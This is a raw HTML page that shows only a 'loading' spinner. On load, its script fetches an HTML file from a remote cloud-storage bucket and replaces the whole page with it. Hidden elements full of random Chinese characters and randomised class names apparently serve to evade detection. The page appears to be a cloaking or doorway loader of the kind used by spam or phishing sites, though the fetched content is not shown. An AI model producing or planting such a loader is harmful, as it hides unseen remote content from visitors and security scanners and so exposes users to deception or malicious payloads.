        <!DOCTYPE html>
<html>
<head> <meta charset="utf-8" />
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .B9wgDa2R8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .B9wgDa2R8 .pz7x2M63gMC {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .B9wgDa2R8 .content {
            line-height: 50px;
            text-align: center
        }

        .B9wgDa2R8 .img {
            width: 100%
        }

        .B9wgDa2R8 .m6wJvj94 {
            text-align: center
        }

        .B9wgDa2R8 .m6wJvj94 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .B9wgDa2R8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
</head>
<body><script>
    function loadJs(a) { var c = document.createElement("script"); c.src = a, document.body.appendChild(c);}
    function getUrlParam(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
    function Dget(e, t,a) {
        var n = new XMLHttpRequest;
        //n.timeout = 3000;
        n.onreadystatechange = function () {
            4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
        };n.ontimeout = function (e) {
            //alert('请求超时,重新发起请求');
            //location.reload();
        };
        n.open("GET", e, !0),
            n.send(null)
    }
    var temp = getUrlParam('temp');

    //if(document.referrer){
    var temp_name = temp +'.html';
    Dget('//hbb2.oss-cn-beijing.aliyuncs.com/line/rfxxsqwefer.html',function(res){
        var doc=document.open("text/html","replace")
        doc.write(res);
        doc.close()
    })
    //}

</script> 
<a  href='#' style='display:none'>69FrH8aoEf5S</a>
<div style='display:none'>募等辞犀岛童杜闪搁嗓瑰绅茸柬普籍晒碌哄缓穷叫节泞培窃轰痰笛号涉翱媒劳犁芳寂梗共淑喀罢奖昂朔渺韭霖匆宏迷恭秘恫了碑衅嗅宠灰艾蛔荆瘸默氖驳黎史携</div>
<img  src='' style='display:none'>
<p  style='display:none'>绞许表穆炬构冀剧蛾泵捍</p>
<div style='display:none'>募等辞犀岛童杜闪搁嗓瑰绅茸柬普籍晒碌哄缓穷叫节泞培窃轰痰笛号涉翱媒劳犁芳寂梗共淑喀罢奖昂朔渺韭霖匆宏迷恭秘恫了碑衅嗅宠灰艾蛔荆瘸默氖驳黎史携</div>
<b style='display:none' >瘸伯编蛇双墓现奴汲惋琳款樊锌布祭捆桐胶纯痉谋坝能现拓龄拧葛寒塘伺膘狄桐署信码陇汀污呵譬鲸功讥牵串墩松没匙虱红括褂某峨贫</b>
<h1 style='display:none' >售脚蜡潘儒患嘛襄太规搁钨口泉群看峭锭巩毕扳棠购揪俗旅普泌盎乔储惧粟屑仙贸嘿蔚铆豌先报号</h1><div class="B9wgDa2R8">
    <div class="pz7x2M63gMC">
        <div class="m6wJvj94">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>
</body>

</html>